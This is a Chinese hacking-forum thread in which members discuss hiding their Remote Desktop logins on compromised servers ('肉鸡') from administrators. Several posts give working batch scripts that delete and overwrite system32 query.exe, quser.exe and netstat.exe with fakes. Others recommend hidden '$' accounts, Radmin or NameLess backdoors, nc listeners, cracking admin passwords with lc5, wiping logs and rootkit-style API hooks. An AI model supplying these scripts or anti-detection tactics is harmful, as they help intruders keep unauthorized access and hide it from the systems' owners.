[讨论]如何隐藏3389登陆用户 用户, 隐藏, 登陆, 讨论

s37su37

[讨论]如何隐藏3389登陆用户
议题作者：huffery
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

经常需要通过3389服务登陆肉鸡，作一些事情。这样在任务管理器里面可以发现
当前登陆的用户。虽然是克隆帐户，显示的是被克隆的用户。这样也不够好。
管理员发现会怀疑的。不知谁思考过这个问题，或者有解决的方法。大家讨论讨论
帖子15 精华4 积分79 阅读权限40 在线时间35 小时 注册时间2005-7-17 最后登录2008-1-28 查看详细资料引用 报告 回复 TOP 爱要怎么说出口


hshack
晶莹剔透§烈日灼然

我为车狂

那你就直接破解管理员密码。与管理员同用一个帐户。这样任务管理器里看到的就是他自己了。
不管怎么样只要你登陆终端。。第一 。连接是有的。除非你可以复用端口
第二。终端连接管理器也是可以看到的。
你应该说如何不让管理员发现哦。。克隆也只是起到一个隐藏的作用。当你建立连接的时候想不被发现有点不大可能。不过有几个人天天看。
直接留个好点的后门好了。。。
帖子4 精华0 积分22 阅读权限40 在线时间0 小时 注册时间2006-5-6 最后登录2007-3-3 查看详细资料引用 报告 回复 TOP 赚更多的钱

yyb1813
晶莹剔透§烈日灼然

喂食猫

我的做法直接替换他的文件 query.exe
让他根本就不显示，用记事本做一个文件另存为exe

一个假的query.exe
不管我们用什么办法安装终端 怎么隐藏安装的痕迹
当管理员命令行运行query user的时候 一切就暴露了
将query.exe COPY 到肉机system32下 替换正版query.exe
这样 管理员运行query user 就会出现
[这个工具需要运行终端服务。]
将终端服务更好的隐藏起来


==========================

@echo off
@del c:\winn\system32\query.exe
@del c:\winnt\system32\dllcache\query.exe
@del c:\winn\system32\quser.exe
@del c:\winnt\system32\dllcache\quser.exe
@copy c:\winnt\query.exe c:\winnt\system32\query.exe
@copy c:\winnt\quser.exe c:\winnt\system32\quser.exe

批处理两个文件，如果对方没开终端可以用que.exe代替,装过终端的话用其它同名文件替换就可以了。但注意的是出现替换系统文件时按取消保留，然后确定替换！


@echo off
@del c:\winn\system32\query.exe
@del c:\winnt\system32\dllcache\query.exe
@del c:\winn\system32\quser.exe
@del c:\winnt\system32\dllcache\quser.exe
@copy c:\winnt\que.exe c:\winnt\system32\query.exe
@copy c:\winnt\que.exe c:\winnt\system32\quser.exe
==========
@echo off
@del c:\winn\system32\netstat.exe
@del c:\winnt\system32\dllcache\netstat.exe
@del C:\WINNT\ServicePackFiles\i386\netstat.exe
@copy c:\winnt\query.exe c:\winnt\system32\netstat.exe
帖子66 精华0 积分209 阅读权限40 在线时间46 小时 注册时间2006-1-19 最后登录2008-7-12 查看详细资料引用 报告 回复 TOP 您知道您年薪应是多少?

dingking
荣誉会员

风的方向

直接运行 tsadmin 就可以看到用户登陆。不一定要用 query 。
所以最好把 tsadmin 也修改了。昨天是明天的前天今天是昨天的明天明天是昨天的后天    ╰o╯╰o╯
帖子741 精华2 积分4784 阅读权限100 性别男 在线时间756 小时 注册时间2005-6-17 最后登录2008-7-18 查看详细资料引用 报告 回复 TOP

iskilo
晶莹剔透§烈日灼然

天下无敌

这一些可以还要破解查询入口，用API-HOOK来实现用户隐藏。
帖子20 精华0 积分54 阅读权限40 在线时间33 小时 注册时间2005-7-19 最后登录2008-2-9 查看详细资料引用 报告 回复 TOP 良辰择日，预测咨询，公司改名，权威易经

st285
晶莹剔透§烈日灼然

天下无敌

不是说用net user st285$ 123456 /add.就是在帐号后面加个"$"这样用net user都查不出来.然后去C:\Documents and Settings\All Users或者C:\Documents and Settings\Administrator下面把以你的帐号命名的文件夹属性改成隐藏不就可以瞒天过海拉？

帖子72 精华0 积分127 阅读权限40 性别男 在线时间39 小时 注册时间2006-2-8 最后登录2008-7-18 查看个人网站
查看详细资料引用 报告 回复 TOP 良辰择日，预测咨询，公司改名，权威易经

网虫qqq
晶莹剔透§烈日灼然

NSX

@echo off
@del c:\winn\system32\query.exe
@del c:\winnt\system32\dllcache\query.exe
@del c:\winn\system32\quser.exe
@del c:\winnt\system32\dllcache\quser.exe
@copy c:\winnt\query.exe c:\winnt\system32\query.exe
@copy c:\winnt\quser.exe c:\winnt\system32\quser.exe


  这样的代码怎么运行？
帖子7 精华0 积分51 阅读权限40 在线时间15 小时 注册时间2006-8-5 最后登录2008-7-7 查看详细资料引用 报告 回复 TOP 让女孩一夜变的更有女人味

zhuixun2006
晶莹剔透§烈日灼然

yemao4587

引用:
这里是引用第[7 楼]的网虫qqq于2006-08-05 14:25发表的：
@echo off
@del c:winnsystem32query.exe
@del c:winntsystem32dllcachequery.exe
@del c:winnsystem32quser.exe
@del c:winntsystem32dllcachequser.exe
.......
你得先把假的query.exe复制到指定的目录，然后进行替换。
不过，管理员还是可以在终端的管理里面看见你在线的。http://Zhuixun.A.gg 我的BOLG
帖子60 精华0 积分116 阅读权限40 性别男 在线时间38 小时 注册时间2006-5-6 最后登录2006-10-21 查看详细资料引用 报告 回复 TOP

antiblue
晶莹剔透§烈日灼然

powerfive

要我说 3389还是比较容易被发现 装个后门不错 把Radmin打造一下 做个假的服务 还是很好用的
帖子6 精华0 积分23 阅读权限40 在线时间17 小时 注册时间2005-11-14 最后登录2008-7-16 查看详细资料引用 报告 回复 TOP

webmaster
晶莹剔透§烈日灼然

=wayne=

就目前而言，如果你要对电脑进行操作，最好还是用3389，radmin类似于一个合法木马，你在操作时，肉鸡管理员看到鼠标乱窜，不被吓坏才奇怪哦。
3389一般来说还是够用了。
有一楼的朋友说跟管理员用一个同样的账户就不会被发现，其实不然，如果你和管理员都用的时候一个账户，如administrator，在任务管理器里面会出现两个相同账户的运行记录的。请多赐教！谢谢！

帖子3 精华0 积分13 阅读权限40 性别男 在线时间7 小时 注册时间2006-8-11 最后登录2006-10-18 查看详细资料引用 报告 回复 TOP

小猴哥
荣誉会员

paul

用黑客之门+radmin就够了，一般情况下3389还是好用，但是一般不太容易被发现，哪个SB管理员天天趴服务器上看谁上线，除非你命背或者日志记录，记的用工具清除！
帖子16 精华0 积分24 阅读权限100 在线时间16 小时 注册时间2005-11-3 最后登录2008-6-15 查看详细资料引用 报告 回复 TOP

dingsy
晶莹剔透§烈日灼然

佳仔

你说的这问题好象只有2003才会出现吧
帖子14 精华0 积分48 阅读权限40 在线时间15 小时 注册时间2005-2-3 最后登录2008-1-8 查看详细资料引用 报告 回复 TOP

huffery
晶莹剔透§烈日灼然

XYFHID

上面许多人都没有明白我的问题. 就是管理员能够发现有其他人登陆.
不是隐藏用户名的问题.
任务管理器/ - 用户,就可以看到拉.
我想这应该是将来写rootkit要考虑的. 要hook一些涵数吧..
3389确实好用,而且服务器机器比你自己要好的多, 又是外网, 独立IP
BT下载nM每秒, 作为跳板, 作为反弹后门主机..........
帖子15 精华4 积分79 阅读权限40 在线时间35 小时 注册时间2005-7-17 最后登录2008-1-28 查看详细资料引用 报告 回复 TOP

testplay
晶莹剔透§烈日灼然

auqa

你所要求的东西太难,你都连上去了,要躲过他人的眼睛不是那么容易. 换个方法来解决当前的困惑.
很多事情不一定要用终端图形来操作,锻炼在shell下操作的能力,既能隐藏行踪,又能让对方服务器少耗资源.
关于bt,你的问题在于需要长时间连接终端.那先登陆,选择好你要下载的东西,并配制bt工具为启动继续先前任务退出终端,进入自己安装的shell后门(system权限),start bt程序.这样不就能下载了?而你又能自行退出shell,不留IP没有用户登陆,没有长连接存在.
关于反弹溢出的程序,可以打开对方telnet啊,t上去就象本地cmd一样稳定,来个nc监听.
帖子26 精华0 积分93 阅读权限40 在线时间25 小时 注册时间2005-1-27 最后登录2008-2-2 查看详细资料引用 报告 回复 TOP

cnhcerkf
运维管理组

langchen

我感觉可以放个小马的哈，或者用lake2的sqlshell。很不错的选择。
如果想长期保留，还可以新建立用户，半夜登陆。。跑个lc5，嘿嘿，把他psw跑出来就OK了。。珍爱生命，潜心修炼，早日成仙。
帖子374 精华2 积分3971 阅读权限150 性别男 在线时间708 小时 注册时间2006-8-27 最后登录2008-7-6 查看详细资料引用 报告 回复 TOP

liu830219
晶莹剔透§烈日灼然

XIELLP

装一些小后门比如nameNameLess 既可以正向连又可以反向连.每次想连3389的时候先看看管理员在不在线.哪位高手也可以写个程序监视有没有人连上来的,一但有人连上服务器就报警.
帖子12 精华0 积分38 阅读权限40 性别男 在线时间52 小时 注册时间2006-8-3 最后登录2008-7-1 查看详细资料引用 报告 回复 TOP

infofly
晶莹剔透§烈日灼然

草本刚

想问下，专业版2k怎么转server版，以前看到过一个小东西。现在不见了。
帖子22 精华0 积分50 阅读权限40 在线时间32 小时 注册时间2006-8-13 最后登录2008-7-11 查看详细资料引用 报告 回复 TOP

跟着感觉走
晶莹剔透§烈日灼然

车BB

引用:
这里是引用第[18 楼]的infofly于2006-08-28 04:38发表的：
想问下，专业版2k怎么转server版，以前看到过一个小东西。现在不见了。
---------------再次安装选升级就可以了，是在2003 server企业版下可以实现，其他的不清楚。
帖子19 精华0 积分27 阅读权限40 在线时间0 小时 注册时间2005-10-29 最后登录2007-11-2 查看详细资料引用 报告 回复 TOP

寂寞宝贝
荣誉会员

非法操作

不管你怎么隐藏，打开注册表编辑器的RAM项，全部暴光！成功的男人白天瞎JB忙，晚上JB瞎忙；失败的男人白天没啥鸟事，晚上鸟没啥事。

帖子428 精华12 积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16 查看个人网站
查看详细资料引用 报告 回复 TOP

tveo
晶莹剔透§烈日灼然

ming312

引用:
这里是引用第[18 楼]的infofly于2006-08-28 04:38发表的：
想问下，专业版2k怎么转server版，以前看到过一个小东西。现在不见了。
NTSwitch
帖子1 精华0 积分6 阅读权限40 在线时间35 小时 注册时间2005-1-12 最后登录2007-12-7 查看详细资料引用 报告 回复 TOP

iskilo
晶莹剔透§烈日灼然